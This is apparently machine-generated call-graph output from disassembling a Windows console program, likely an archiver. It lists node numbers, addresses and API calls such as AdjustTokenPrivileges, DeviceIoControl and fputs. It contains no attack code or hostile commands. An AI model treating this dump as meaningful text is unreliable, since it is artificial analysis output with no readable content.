cbef67 _CxxThrowException 75166->75285 75167 cc04db 75171 cbf047 _CxxThrowException 75167->75171 75169 cc04e3 75174 cc054a 75169->75174 75291 cbef67 _CxxThrowException 75169->75291 75173 cbf047 _CxxThrowException 75170->75173 75171->75169 75172 cc04f3 75172->75169 75290 c8089e malloc _CxxThrowException free _CxxThrowException memcpy 75172->75290 75173->75153 75174->75087 75179 cb04d2 5 API calls 75178->75179 75180 c812ad 75179->75180 75181 c71e0c ctype 2 API calls 75180->75181 75182 c812b4 75181->75182 75182->75087 75184 cb81f6 __EH_prolog 75183->75184 75292 cbf749 75184->75292 75186 cb824e 75187 cb823b 75187->75186 75296 cb8f58 75187->75296 75270 cbb8e6 __EH_prolog 75269->75270 75366 c71e40 free 75270->75366 75272 cbb90d 75367 cae647 free ctype 75272->75367 75274 cbb915 75279->75094 75280->75096 75283->75159 75284->75166 75285->75170 75286->75161 75287->75151 75288->75167 75289->75172 75290->75172 75291->75174 75293 cbf779 75292->75293 75294 cbf782 _CxxThrowException 75293->75294 75295 cbf797 75293->75295 75294->75295 75295->75187 75366->75272 75367->75274 75368 c742d1 75369 c742bd 75368->75369 75370 c71e0c ctype 2 API calls 75369->75370 75371 c742c5 75369->75371 75370->75371 75372 c81ade 75373 c81ae8 __EH_prolog 75372->75373 75423 c713f5 75373->75423 75376 c81b32 6 API calls 75378 c81b8d 75376->75378 75387 c81bf8 75378->75387 75441 c81ea4 9 API calls 75378->75441 75379 c81b24 _CxxThrowException 75379->75376 75381 c81bdf 75442 c727bb 75381->75442 75385 c81c89 75437 c81eb9 75385->75437 75387->75385 75449 c91d73 5 API calls __EH_prolog 75387->75449 75390 c81cb2 _CxxThrowException 75390->75385 75424 c713ff __EH_prolog 75423->75424 75425 c97ebb free 75424->75425 75426 c7142b 75425->75426 75427 c71438 75426->75427 75450 c71212 free ctype 75426->75450 75429 c71e0c ctype 2 API calls 75427->75429 75430 c7144d 75429->75430 75431 cb04d2 5 API calls 75430->75431 75434 c71507 75430->75434 75436 c714f4 75430->75436 75451 c71265 5 API calls 2 library calls 75430->75451 75452 c71524 malloc _CxxThrowException __EH_prolog ctype 75430->75452 75431->75430 75435 c72fec 3 API calls 75434->75435 75435->75436 75436->75376 75440 c91d73 5 API calls __EH_prolog 75436->75440 75453 c79313 GetCurrentProcess OpenProcessToken 75437->75453 75440->75379 75441->75381 75443 c727c7 75442->75443 75447 c727e3 75442->75447 75444 c71e0c ctype 2 API calls 75443->75444 75443->75447 75445 c727da 75444->75445 75460 c71e40 free 75445->75460 75448 c71e40 free 75447->75448 75448->75387 75449->75390 75450->75427 75451->75430 75452->75430 75454 c79390 75453->75454 75455 c7933a LookupPrivilegeValueW 75453->75455 75456 c79382 75455->75456 75457 c7934c AdjustTokenPrivileges 75455->75457 75459 c79385 CloseHandle 75456->75459 75457->75456 75458 c79372 GetLastError 75457->75458 75458->75459 75459->75454 75460->75447 75461 caacd3 75462 caace0 75461->75462 75463 caacf1 75461->75463 75462->75463 75467 caacf8 75462->75467 75468 cac0b3 __EH_prolog 75467->75468 75469 cac0ed 75468->75469 75475 c97193 75468->75475 75483 c71e40 free 75468->75483 75484 c71e40 free 75469->75484 75471 caaceb 75474 c71e40 free 75471->75474 75474->75463 75476 c9719d __EH_prolog 75475->75476 75485 ca2db9 free ctype 75476->75485 75478 c971b3 75486 c971d5 free __EH_prolog ctype 75478->75486 75480 c971bf 75487 c71e40 free 75480->75487 75482 c971c7 75482->75468 75483->75468 75484->75471 75485->75478 75486->75480 75487->75482 75488 c7b5d9 75489 c7b5e6 75488->75489 75493 c7b5f7 75488->75493 75489->75493 75494 c7b5fe 75489->75494 75495 c7b608 __EH_prolog 75494->75495 75501 cf6a40 VirtualFree 75495->75501 75497 c7b63d 75498 c7764c CloseHandle 75497->75498 75499 c7b5f1 75498->75499 75500 c71e40 free 75499->75500 75500->75493 75501->75497 75502 cf69d0 75503 cf69d7 malloc 75502->75503 75504 cf69d4 75502->75504 75506 c81368 75508 c8136d 75506->75508 75509 c8138c 75508->75509 75512 d07d80 WaitForSingleObject 75508->75512 75515 caf745 75508->75515 75519 d07ea0 SetEvent GetLastError 75508->75519 75513 d07d98 75512->75513 75514 d07d8e GetLastError 75512->75514 75513->75508 75514->75513 75516 caf74f __EH_prolog 75515->75516 75520 caf784 75516->75520 75518 caf765 75518->75508 75519->75508 75521 caf78e __EH_prolog 75520->75521 75522 c812d4 4 API calls 75521->75522 75523 caf7c7 75522->75523 75524 c812d4 4 API calls 75523->75524 75525 caf7d4 75524->75525 75526 caf871 75525->75526 75529 c7c4d6 75525->75529 75535 cf6b23 VirtualAlloc 75525->75535 75526->75518 75533 c7c4e9 75529->75533 75530 c8111c 10 API calls 75530->75533 75531 c811b4 107 API calls 75531->75533 75532 c7c6f3 75532->75526 75533->75530 75533->75531 75533->75532 75533->75533 75534 c7c695 memmove 75533->75534 75534->75533 75535->75526 75536 d0ffb1 __setusermatherr 75537 d0ffbd 75536->75537 75542 d10068 _controlfp 75537->75542 75539 d0ffc2 _initterm __getmainargs _initterm __p___initenv 75540 cac27c 75539->75540 75541 d1001d exit _XcptFilter 75540->75541 75542->75539 75543 caa42c 75544 caa449 75543->75544 75545 caa435 fputs 75543->75545 75702 ca545d 75544->75702 75701 c71fa0 fputc 75545->75701 75549 c72e04 2 API calls 75550 caa4a1 75549->75550 75706 c91858 75550->75706 75552 caa4c9 75768 c71e40 free 75552->75768 75554 caa4d8 75555 caa4ee 75554->75555 75769 cac7d7 75554->75769 75557 caa50e 75555->75557 75777 ca57fb 75555->75777 75787 cac73e 75557->75787 75562 caac17 75965 ca2db9 free ctype 75562->75965 75563 c71e0c ctype 2 API calls 75565 caa53a 75563->75565 75566 caa54d 75565->75566 75923 cab0fa malloc _CxxThrowException __EH_prolog 75565->75923 75574 c72fec 3 API calls 75566->75574 75567 caac3a 75967 cab96d _CxxThrowException 75567->75967 75568 caac23 75568->75567 75571 caac35 75568->75571 75966 cab988 33 API calls __aulldiv 75571->75966 75573 caac42 75968 c71e40 free 75573->75968 75579 caa586 75574->75579 75576 caac4d 75969 c93247 75576->75969 75805 caad06 75579->75805 75583 caac7d 75976 c711c2 free __EH_prolog ctype 75583->75976 75588 caac89 75678 caaae5 75964 ca2db9 free ctype 75678->75964 75701->75544 75703 ca5473 75702->75703 75704 ca5466 75702->75704 75703->75549 75979 c7275e malloc _CxxThrowException free ctype 75704->75979 75707 c91862 __EH_prolog 75706->75707 75980 c9021a 75707->75980 75712 c918b9 75994 c91aa5 free __EH_prolog ctype 75712->75994 75713 c91935 75999 c91aa5 free __EH_prolog ctype 75713->75999 75716 c918c7 75995 ca2db9 free ctype 75716->75995 75717 c91944 75739 c91966 75717->75739 76000 c91d73 5 API calls __EH_prolog 75717->76000 75720 c918d3 75720->75552 75722 cb04d2 5 API calls 75728 c918db 75722->75728 75723 c91958 _CxxThrowException 75723->75739 75724 c919be 76003 c9f1f1 malloc _CxxThrowException free _CxxThrowException 75724->76003 75727 c72e04 2 API calls 75727->75739 75728->75713 75728->75722 75996 c90144 malloc _CxxThrowException free _CxxThrowException 75728->75996 75997 c71524 malloc _CxxThrowException __EH_prolog ctype 75728->75997 75998 c71e40 free 75728->75998 75729 c919d6 75731 c97ebb free 75729->75731 75733 c919e1 75731->75733 75732 c7631f 9 API calls 75732->75739 75734 c812d4 4 API calls 75733->75734 75736 c919ea 75734->75736 75735 cb04d2 5 API calls 75735->75739 75737 c97ebb free 75736->75737 75740 c919f7 75737->75740 75739->75724 75739->75727 75739->75732 75739->75735 76001 c71524 malloc _CxxThrowException __EH_prolog ctype 75739->76001 76002 c71e40 free 75739->76002 75742 c812d4 4 API calls 75740->75742 75749 c919ff 75742->75749 75743 c91a4f 76005 c71e40 free 75743->76005 75745 c71524 malloc _CxxThrowException 75745->75749 75746 c91a57 76006 ca2db9 free ctype 75746->76006 75748 c91a64 76007 ca2db9 free ctype 75748->76007 75749->75743 75749->75745 75752 c91a83 75749->75752 76004 c742e3 CharUpperW 75749->76004 76008 c91d73 5 API calls __EH_prolog 75752->76008 75754 c91a97 _CxxThrowException 75755 c91aa5 __EH_prolog 75754->75755 76009 c71e40 free 75755->76009 75757 c91ac8 76010 c902e8 free ctype 75757->76010 75759 c91ad1 76011 c91eab free __EH_prolog ctype 75759->76011 75761 c91add 76012 c71e40 free 75761->76012 75763 c91ae5 76013 c71e40 free 75763->76013 75765 c91aed 76014 ca2db9 free ctype 75765->76014 75767 c91afa 75767->75552 75768->75554 75770 cac849 75769->75770 75773 cac7ea 75769->75773 75771 cac85a 75770->75771 76143 c71f91 fflush 75770->76143 75771->75555 75772 cac7fe fputs 75772->75770 75773->75772 76142 c725cb malloc _CxxThrowException free _CxxThrowException ctype 75773->76142 75778 ca5805 __EH_prolog 75777->75778 75786 ca5847 75778->75786 76144 c726dd 75778->76144 75784 ca583f 76164 c71e40 free 75784->76164 75786->75557 75788 cac748 __EH_prolog 75787->75788 75789 cac7d7 ctype 6 API calls 75788->75789 75790 cac75d 75789->75790 76203 c71e40 free 75790->76203 75792 cac768 75793 c92c0b ctype free 75792->75793 75794 cac775 75793->75794 76204 c71e40 free 75794->76204 75796 cac77d 76205 c71e40 free 75796->76205 75798 cac785 76206 c71e40 free 75798->76206 75800 cac78d 76207 c71e40 free 75800->76207 75802 cac795 75803 c92c0b ctype free 75802->75803 75804 caa51d 75803->75804 75804->75563 75804->75678 76208 caad29 75805->76208 75808 cabf3e 75809 c72fec 3 API calls 75808->75809 75810 cabf85 75809->75810 75811 c72fec 3 API calls 75810->75811 75812 caa5ee 75811->75812 75813 c83a29 75812->75813 75814 c83a3b 75813->75814 75815 c83a37 75813->75815 75923->75566 75964->75562 75965->75568 75966->75567 75967->75573 75968->75576 75973 c9324e 75969->75973 75970 c93260 76925 c71e40 free 75970->76925 75973->75970 76926 c71e40 free 75973->76926 75974 c93267 75975 c71e40 free 75974->75975 75975->75583 75976->75588 75979->75703 75981 c90224 __EH_prolog 75980->75981 76015 c83d66 75981->76015 75984 c9062e 75989 c90638 __EH_prolog 75984->75989 75985 c906de 76102 c9019a malloc _CxxThrowException free memcpy 75985->76102 75987 c906e6 76103 c91453 26 API calls 2 library calls 75987->76103 75989->75985 75991 c901bc malloc _CxxThrowException free _CxxThrowException memcpy 75989->75991 75993 c906ee 75989->75993 76031 c90703 75989->76031 76101 ca2db9 free ctype 75989->76101 75991->75989 75993->75712 75993->75728 75994->75716 75995->75720 75996->75728 75997->75728 75998->75728 75999->75717 76000->75723 76001->75739 76002->75739 76003->75729 76004->75749 76005->75746 76006->75748 76007->75720 76008->75754 76009->75757 76010->75759 76011->75761 76012->75763 76013->75765 76014->75767 76026 d0fb10 76015->76026 76017 c83d70 GetCurrentProcess 76027 c83e04 76017->76027 76019 c83d8d OpenProcessToken 76020 c83d9e LookupPrivilegeValueW 76019->76020 76021 c83de3 76019->76021 76020->76021 76022 c83dc0 AdjustTokenPrivileges 76020->76022 76023 c83e04 CloseHandle 76021->76023 76022->76021 76024 c83dd5 GetLastError 76022->76024 76025 c83def 76023->76025 76024->76021 76025->75984 76026->76017 76028 c83e0d 76027->76028 76029 c83e11 CloseHandle 76027->76029 76028->76019 76030 c83e21 76029->76030 76030->76019 76092 c9070d __EH_prolog 76031->76092 76032 c90b40 76032->75989 76033 c90e1d 76139 c90416 18 API calls 2 library calls 76033->76139 76035 c90ea6 76141 cbec78 free ctype 76035->76141 76036 c90d11 76133 c77496 7 API calls 2 library calls 76036->76133 76037 c90c83 76037->76033 76037->76036 76039 c72da9 2 API calls 76039->76092 76042 c90c13 76130 c71e40 free 76042->76130 76044 c72da9 2 API calls 76082 c90ab5 76044->76082 76045 c90e47 76045->76035 76140 c9117d 68 API calls 2 library calls 76045->76140 76046 c90de0 76135 ca2db9 free ctype 76046->76135 76048 c72f1c 2 API calls 76074 c90d29 76048->76074 76049 c90df8 76137 c71e40 free 76049->76137 76050 c72e04 2 API calls 76050->76092 76052 c72e04 2 API calls 76052->76082 76055 c90e02 76138 ca2db9 free ctype 76055->76138 76057 c72e04 2 API calls 76057->76074 76059 c72fec 3 API calls 76059->76092 76063 c72fec 3 API calls 76063->76074 76064 c72fec 3 API calls 76064->76082 76068 c9050b 44 API calls 76068->76082 76070 c90df3 76136 c71e40 free 76070->76136 76073 c71e40 free ctype 76073->76074 76074->76046 76074->76048 76074->76049 76074->76057 76074->76063 76074->76070 76074->76073 76134 c9117d 68 API calls 2 library calls 76074->76134 76076 c90c79 76132 c71e40 free 76076->76132 76077 c90b30 76123 c71e40 free 76077->76123 76080 c90b38 76124 c71e40 free 76080->76124 76082->76042 76082->76044 76082->76052 76082->76064 76082->76068 76082->76076 76083 c71e40 free ctype 76082->76083 76121 c72f4a malloc _CxxThrowException free ctype 76082->76121 76126 c71089 malloc _CxxThrowException free _CxxThrowException 76082->76126 76127 c913eb 5 API calls 2 library calls 76082->76127 76128 c90ef4 68 API calls 2 library calls 76082->76128 76129 ca2db9 free ctype 76082->76129 76131 c90021 GetLastError 76082->76131 76083->76082 76086 ca2db9 free ctype 76086->76092 76091 cb04d2 malloc _CxxThrowException free _CxxThrowException memcpy 76091->76092 76092->76032 76092->76037 76092->76039 76092->76050 76092->76059 76092->76082 76092->76086 76092->76091 76095 c90b48 76092->76095 76097 c90b26 76092->76097 76098 c71524 malloc _CxxThrowException 76092->76098 76099 c71e40 free ctype 76092->76099 76104 c72f4a malloc _CxxThrowException free ctype 76092->76104 76105 c71089 malloc _CxxThrowException free _CxxThrowException 76092->76105 76106 c913eb 5 API calls 2 library calls 76092->76106 76107 c9050b 76092->76107 76112 c90021 GetLastError 76092->76112 76113 c749bd 9 API calls 2 library calls 76092->76113 76114 c90306 12 API calls 76092->76114 76115 c8ff00 5 API calls 2 library calls 76092->76115 76116 c9057d 16 API calls 2 library calls 76092->76116 76117 c90f8e 24 API calls 2 library calls 76092->76117 76118 c7472e CharUpperW 76092->76118 76119 c88984 malloc _CxxThrowException free _CxxThrowException memcpy 76092->76119 76120 c90ef4 68 API calls 2 library calls 76092->76120 76125 ca2db9 free ctype 76095->76125 76122 c71e40 free 76097->76122 76098->76092 76099->76092 76101->75989 76102->75987 76103->75993 76104->76092 76105->76092 76106->76092 76108 c76c72 44 API calls 76107->76108 76111 c9051e 76108->76111 76109 c90575 76109->76092 76110 c72f88 3 API calls 76110->76109 76111->76109 76111->76110 76112->76092 76113->76092 76114->76092 76115->76092 76116->76092 76117->76092 76118->76092 76119->76092 76120->76092 76121->76082 76122->76077 76123->76080 76124->76032 76125->76097 76126->76082 76127->76082 76128->76082 76129->76082 76130->76032 76131->76082 76132->76037 76133->76074 76134->76074 76135->76032 76136->76049 76137->76055 76138->76032 76139->76045 76140->76045 76141->76032 76142->75772 76143->75771 76145 c71e0c ctype 2 API calls 76144->76145 76146 c726ea 76145->76146 76147 ca5678 76146->76147 76148 ca5689 76147->76148 76149 ca56b1 76147->76149 76150 ca5593 6 API calls 76148->76150 76165 ca5593 76149->76165 76152 ca56a5 76150->76152 76179 c728a1 76152->76179 76157 ca570e fputs 76163 c71fa0 fputc 76157->76163 76159 ca56ef 76160 ca5593 6 API calls 76159->76160 76161 ca5701 76160->76161 76162 ca5711 6 API calls 76161->76162 76162->76157 76163->75784 76164->75786 76166 ca55ad 76165->76166 76167 c728a1 5 API calls 76166->76167 76168 ca55b8 76167->76168 76184 c7286d 76168->76184 76171 c728a1 5 API calls 76172 ca55c7 76171->76172 76173 ca5711 76172->76173 76174 ca56e0 76173->76174 76175 ca5721 76173->76175 76174->76157 76183 c72881 malloc _CxxThrowException free memcpy _CxxThrowException 76174->76183 76176 c728a1 5 API calls 76175->76176 76177 ca572b 76176->76177 76192 ca55cd 6 API calls 76177->76192 76180 c728b0 76179->76180 76193 c7267f 76180->76193 76182 c728bf 76182->76149 76183->76159 76187 c71e9d 76184->76187 76188 c71ead 76187->76188 76189 c71ea8 76187->76189 76188->76171 76191 c7263c malloc _CxxThrowException free memcpy _CxxThrowException 76189->76191 76191->76188 76192->76174 76194 c726c2 76193->76194 76195 c72693 76193->76195 76194->76182 76196 c726c8 _CxxThrowException 76195->76196 76198 c726bc 76195->76198 76197 c726dd 76196->76197 76200 c71e0c ctype 2 API calls 76197->76200 76202 c72595 malloc _CxxThrowException free memcpy ctype 76198->76202 76201 c726ea 76200->76201 76201->76182 76202->76194 76203->75792 76204->75796 76205->75798 76206->75800 76207->75802 76209 caad33 __EH_prolog 76208->76209 76210 c72e04 2 API calls 76209->76210 76211 caad5f 76210->76211 76212 c72e04 2 API calls 76211->76212 76213 caa5d8 76212->76213 76213->75808 76925->75974 76926->75973 76927 c77b20 76930 c77ab2 76927->76930 76931 c77ac5 76930->76931 76932 c7759a 12 API calls 76931->76932 76933 c77ade 76932->76933 76934 c77aeb SetFileTime 76933->76934 76935 c77b03 76933->76935 76934->76935 76938 c77919 76935->76938 76939 c77aac 76938->76939 76940 c7793c 76938->76940 76940->76939 76941 c77945 DeviceIoControl 76940->76941 76942 c779e6 76941->76942 76943 c77969 76941->76943 76944 c779ef DeviceIoControl 76942->76944 76947 c77a14 76942->76947 76943->76942 76949 c779a7 76943->76949 76945 c77a22 DeviceIoControl 76944->76945 76944->76947 76946 c77a44 DeviceIoControl 76945->76946 76945->76947 76946->76947 76947->76939 76955 c7780d 8 API calls ctype 76947->76955 76954 c79252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 76949->76954 76950 c77aa5 76952 c777de 5 API calls 76950->76952 76952->76939 76953 c779d0 76953->76942 76954->76953 76955->76950 76956 cac2e6 76957 cac52f 76956->76957 76960 ca544f SetConsoleCtrlHandler 76957->76960 76959 cac53b 76960->76959 76961 cf6ba3 VirtualFree 76962 cbbf67 76963 cbbf74 76962->76963 76967 cbbf85 76962->76967 76963->76967 76968 cbbf8c 76963->76968 76969 cbbf96 __EH_prolog 76968->76969 76985 cbd144 76969->76985 76973 cbbfd0 76992 c71e40 free 76973->76992 76975 cbbfdb 76993 c71e40 free 76975->76993 76977 cbbfe6 76994 cbc072 free ctype 76977->76994 76979 cbbff4 76995 c8aafa free VariantClear ctype 76979->76995 76981 cbc023 76996 c973d2 free VariantClear __EH_prolog ctype 76981->76996 76983 cbbf7f 76984 c71e40 free 76983->76984 76984->76967 76987 cbd14e __EH_prolog 76985->76987 76986 cbd1b7 free 76988 cbd180 76986->76988 76987->76986 76997 cb8e04 memset 76988->76997 76990 cbbfc5 76991 c71e40 free 76990->76991 76991->76973 76992->76975 76993->76977 76994->76979 76995->76981 76996->76983 76997->76990 76998 d07da0 WaitForSingleObject 76999 d07dc1 76998->76999 77000 d07dbb GetLastError 76998->77000 77001 d07ddf 76999->77001 77002 d07dce CloseHandle 76999->77002 77000->76999 77002->77001 77003 d07dd9 GetLastError 77002->77003 77003->77001 77004 c9cefb 77005 c9d0cc 77004->77005 77006 c9cf03 77004->77006 77006->77005 77051 c9cae9 VariantClear 77006->77051 77008 c9cf59 77008->77005 77052 c9cae9 VariantClear 77008->77052 77010 c9cf71 77010->77005 77053 c9cae9 VariantClear 77010->77053 77012 c9cf87 77012->77005 77054 c9cae9 VariantClear 77012->77054 77014 c9cf9d 77014->77005 77055 c9cae9 VariantClear 77014->77055 77016 c9cfb3 77016->77005 77056 c9cae9 VariantClear 77016->77056 77018 c9cfc9 77018->77005 77057 c74504 malloc _CxxThrowException 77018->77057 77020 c9cfdc 77021 c72e04 2 API calls 77020->77021 77023 c9cfe7 77021->77023 77022 c9d009 77025 c9d07b 77022->77025 77027 c9d080 77022->77027 77028 c9d030 77022->77028 77023->77022 77024 c72f88 3 API calls 77023->77024 77024->77022 77065 c71e40 free 77025->77065 77062 c97a0c CharUpperW 77027->77062 77031 c72e04 2 API calls 77028->77031 77029 c9d0c4 77066 c71e40 free 77029->77066 77032 c9d038 77031->77032 77035 c72e04 2 API calls 77032->77035 77034 c9d08b 77063 c8fdbc 4 API calls 2 library calls 77034->77063 77037 c9d046 77035->77037 77058 c8fdbc 4 API calls 2 library calls 77037->77058 77038 c9d0a7 77040 c72fec 3 API calls 77038->77040 77042 c9d0b3 77040->77042 77041 c9d057 77043 c72fec 3 API calls 77041->77043 77064 c71e40 free 77042->77064 77045 c9d063 77043->77045 77059 c71e40 free 77045->77059 77047 c9d06b 77060 c71e40 free 77047->77060 77049 c9d073 77061 c71e40 free 77049->77061 77051->77008 77052->77010 77053->77012 77054->77014 77055->77016 77056->77018 77057->77020 77058->77041 77059->77047 77060->77049 77061->77025 77062->77034 77063->77038 77064->77025 77065->77029 77066->77005 77067 ca993d 77151 cab5b1 77067->77151 77070 ca9963 77157 c81f33 77070->77157 77071 c71fb3 11 API calls 77071->77070 77073 ca9975 77074 ca99b7 GetStdHandle GetConsoleScreenBufferInfo 77073->77074 77076 ca99ce 77073->77076 77074->77076 77075 c71e0c ctype 2 API calls 77077 ca99dc 77075->77077 77076->77075 77278 c97b48 77077->77278 77079 ca9a29 77295 cab96d _CxxThrowException 77079->77295 77081 ca9a30 77296 c97018 8 API calls 2 library calls 77081->77296 77083 ca9a7c 77297 c9ddb5 6 API calls 2 library calls 77083->77297 77084 ca9a66 _CxxThrowException 77084->77083 77086 ca9aa6 77088 ca9aaa _CxxThrowException 77086->77088 77096 ca9ac0 77086->77096 77087 ca9a37 77087->77083 77087->77084 77088->77096 77089 ca9b3a 77301 c71fa0 fputc 77089->77301 77092 ca9bfa _CxxThrowException 77148 ca9be6 77092->77148 77093 ca9b63 fputs 77302 c71fa0 fputc 77093->77302 77096->77089 77096->77092 77298 c97dd7 7 API calls 2 library calls 77096->77298 77299 cac077 6 API calls 77096->77299 77300 c71e40 free 77096->77300 77097 ca9b79 strlen strlen 77099 ca9baa fputs fputc 77097->77099 77100 ca9e25 77097->77100 77099->77148 77310 c71fa0 fputc 77100->77310 77102 ca9e2c fputs 77311 c71fa0 fputc 77102->77311 77104 ca9f0c 77316 c71fa0 fputc 77104->77316 77108 cab67d 12 API calls 77108->77148 77109 ca9f13 fputs 77317 c71fa0 fputc 77109->77317 77111 ca9f9f 77114 caac3a 77111->77114 77117 caac35 77111->77117 77113 c72e04 2 API calls 77113->77148 77126 ca9f29 77126->77111 77138 ca9f77 fputs 77126->77138 77318 cab650 fputc fputs fputs fputc 77126->77318 77319 cab5e9 fputc fputs 77126->77319 77320 cabde4 fputc fputs 77126->77320 77129 ca9d2a fputs 77307 c721d8 fputs 77129->77307 77133 c731e5 malloc _CxxThrowException free _CxxThrowException 77133->77148 77134 ca9d5f fputs 77134->77148 77137 ca9e42 77137->77104 77144 ca9ee0 fputs 77137->77144 77312 cab650 fputc fputs fputs fputc 77137->77312 77313 c721d8 fputs 77137->77313 77314 cabde4 fputc fputs 77137->77314 77321 c71fa0 fputc 77138->77321 77315 c71fa0 fputc 77144->77315 77148->77099 77148->77100 77148->77108 77148->77113 77148->77129 77148->77133 77148->77134 77303 c721d8 fputs 77148->77303 77304 c7315e malloc _CxxThrowException free _CxxThrowException 77148->77304 77305 c73221 malloc _CxxThrowException free _CxxThrowException 77148->77305 77306 c71089 malloc _CxxThrowException free _CxxThrowException 77148->77306 77308 c71fa0 fputc 77148->77308 77309 c71e40 free 77148->77309 77152 cab5bc fputs 77151->77152 77153 ca994a 77151->77153 77329 c71fa0 fputc 77152->77329 77153->77070 77153->77071 77155 cab5d5 77155->77153 77156 cab5d9 fputs 77155->77156 77156->77153 77158 c81f6c 77157->77158 77159 c81f4f 77157->77159 77330 c829eb 77158->77330 77362 c91d73 5 API calls __EH_prolog 77159->77362 77162 c81f5e _CxxThrowException 77162->77158 77164 c81fa3 77166 c81fbc 77164->77166 77168 c74fc0 5 API calls 77164->77168 77169 c81fda 77166->77169 77170 c72fec 3 API calls 77166->77170 77167 c81f95 _CxxThrowException 77167->77164 77168->77166 77171 c82022 wcscmp 77169->77171 77179 c82036 77169->77179 77170->77169 77172 c820af 77171->77172 77171->77179 77364 c91d73 5 API calls __EH_prolog 77172->77364 77174 c820a9 77365 c8393c 6 API calls 2 library calls 77174->77365 77175 c820be _CxxThrowException 77175->77179 77177 c820f4 77366 c8393c 6 API calls 2 library calls 77177->77366 77179->77174 77183 c8219a 77179->77183 77180 c82108 77181 c82135 77180->77181 77367 c82e04 62 API calls 2 library calls 77180->77367 77189 c82159 77181->77189 77368 c82e04 62 API calls 2 library calls 77181->77368 77369 c91d73 5 API calls __EH_prolog 77183->77369 77186 c821a9 _CxxThrowException 77186->77189 77187 c8227f 77335 c82aa9 77187->77335 77189->77187 77190 c82245 77189->77190 77370 c91d73 5 API calls __EH_prolog 77189->77370 77191 c72fec 3 API calls 77190->77191 77194 c8225c 77191->77194 77194->77187 77371 c91d73 5 API calls __EH_prolog 77194->77371 77195 c822d9 77198 c82302 77195->77198 77200 c72fec 3 API calls 77195->77200 77196 c82237 _CxxThrowException 77196->77190 77197 c72fec 3 API calls 77197->77195 77201 c74fc0 5 API calls 77198->77201 77200->77198 77203 c82315 77201->77203 77202 c82271 _CxxThrowException 77202->77187 77353 c8384c 77203->77353 77205 c82322 77206 c826c6 77205->77206 77218 c823a1 77205->77218 77207 c828ce 77206->77207 77208 c82700 77206->77208 77384 c91d73 5 API calls __EH_prolog 77206->77384 77209 c8293a 77207->77209 77219 c828d5 77207->77219 77385 c832ec 14 API calls 2 library calls 77208->77385 77212 c8293f 77209->77212 77213 c829a5 77209->77213 77392 c74eec 16 API calls 77212->77392 77215 c829ae _CxxThrowException 77213->77215 77270 c8264d 77213->77270 77214 c826f2 _CxxThrowException 77214->77208 77216 c82713 77220 c83a29 5 API calls 77216->77220 77222 c8247a wcscmp 77218->77222 77239 c8248e 77218->77239 77219->77270 77391 c91d73 5 API calls __EH_prolog 77219->77391 77234 c82722 77220->77234 77221 c8294c 77393 c74ea1 8 API calls 77221->77393 77225 c824cf wcscmp 77222->77225 77222->77239 77228 c824ef wcscmp 77225->77228 77225->77239 77231 c8250f 77228->77231 77228->77239 77229 c82953 77232 c74fc0 5 API calls 77229->77232 77230 c82920 _CxxThrowException 77230->77270 77375 c91d73 5 API calls __EH_prolog 77231->77375 77232->77270 77235 c827cf 77234->77235 77237 c72fec 3 API calls 77234->77237 77240 c82880 77235->77240 77245 c8281f 77235->77245 77387 c91d73 5 API calls __EH_prolog 77235->77387 77236 c8251e _CxxThrowException 77238 c8252c 77236->77238 77242 c827a9 77237->77242 77241 c82569 77238->77241 77376 c82e04 62 API calls 2 library calls 77238->77376 77239->77238 77372 c74eec 16 API calls 77239->77372 77373 c74ea1 8 API calls 77239->77373 77374 c91d73 5 API calls __EH_prolog 77239->77374 77243 c8289b 77240->77243 77250 c72fec 3 API calls 77240->77250 77247 c8258c 77241->77247 77377 c82e04 62 API calls 2 library calls 77241->77377 77242->77235 77386 c73563 memmove 77242->77386 77243->77270 77390 c91d73 5 API calls __EH_prolog 77243->77390 77245->77240 77254 c82847 77245->77254 77388 c91d73 5 API calls __EH_prolog 77245->77388 77252 c825a4 77247->77252 77378 c82a61 malloc _CxxThrowException free _CxxThrowException memcpy 77247->77378 77248 c824c1 _CxxThrowException 77248->77225 77250->77243 77379 c74eec 16 API calls 77252->77379 77253 c82811 _CxxThrowException 77253->77245 77254->77240 77389 c91d73 5 API calls __EH_prolog 77254->77389 77261 c825ad 77380 c91b07 49 API calls 77261->77380 77262 c828c0 _CxxThrowException 77262->77207 77263 c82839 _CxxThrowException 77263->77254 77264 c82872 _CxxThrowException 77264->77240 77266 c825b4 77381 c74ea1 8 API calls 77266->77381 77268 c825bb 77269 c72fec 3 API calls 77268->77269 77272 c825d6 77268->77272 77269->77272 77270->77073 77271 c8261f 77271->77270 77274 c72fec 3 API calls 77271->77274 77272->77270 77272->77271 77382 c91d73 5 API calls __EH_prolog 77272->77382 77276 c8263f 77274->77276 77275 c82611 _CxxThrowException 77275->77271 77383 c7859e malloc _CxxThrowException free _CxxThrowException 77276->77383 77279 c97b52 __EH_prolog 77278->77279 77403 c97eec 77279->77403 77282 c97ca4 77282->77079 77283 c730ea malloc _CxxThrowException free 77287 c97b63 77283->77287 77284 c72e04 malloc _CxxThrowException 77284->77287 77286 c71e40 free ctype 77286->77287 77287->77282 77287->77283 77287->77284 77287->77286 77289 c812a5 5 API calls 77287->77289 77290 cb04d2 5 API calls 77287->77290 77291 c7429a 3 API calls 77287->77291 77293 c97c61 memcpy 77287->77293 77294 c97193 free 77287->77294 77408 c970ea 77287->77408 77411 c97a40 77287->77411 77429 c97cc3 6 API calls 77287->77429 77430 c974eb malloc _CxxThrowException memcpy __EH_prolog ctype 77287->77430 77289->77287 77290->77287 77291->77287 77293->77287 77294->77287 77295->77081 77296->77087 77297->77086 77298->77096 77299->77096 77300->77096 77301->77093 77302->77097 77303->77148 77304->77148 77305->77148 77306->77148 77307->77148 77308->77148 77309->77148 77310->77102 77311->77137 77312->77137 77313->77137 77314->77137 77315->77137 77316->77109 77317->77126 77318->77126 77319->77126 77320->77126 77321->77126 77329->77155 77331 c72f1c 2 API calls 77330->77331 77332 c829fe 77331->77332 77394 c71e40 free 77332->77394 77334 c81f7e 77334->77164 77363 c91d73 5 API calls __EH_prolog 77334->77363 77336 c82ab3 __EH_prolog 77335->77336 77337 c72e8a 2 API calls 77336->77337 77344 c82b0f 77336->77344 77338 c82af4 77337->77338 77395 c82a61 malloc _CxxThrowException free _CxxThrowException memcpy 77338->77395 77339 c822ad 77339->77195 77339->77197 77341 c82b04 77396 c71e40 free 77341->77396 77342 c82bc6 77401 c91d73 5 API calls __EH_prolog 77342->77401 77344->77339 77344->77342 77350 c82b9f 77344->77350 77397 c82cb4 48 API calls 2 library calls 77344->77397 77398 c82bf5 8 API calls __EH_prolog 77344->77398 77399 c82a61 malloc _CxxThrowException free _CxxThrowException memcpy 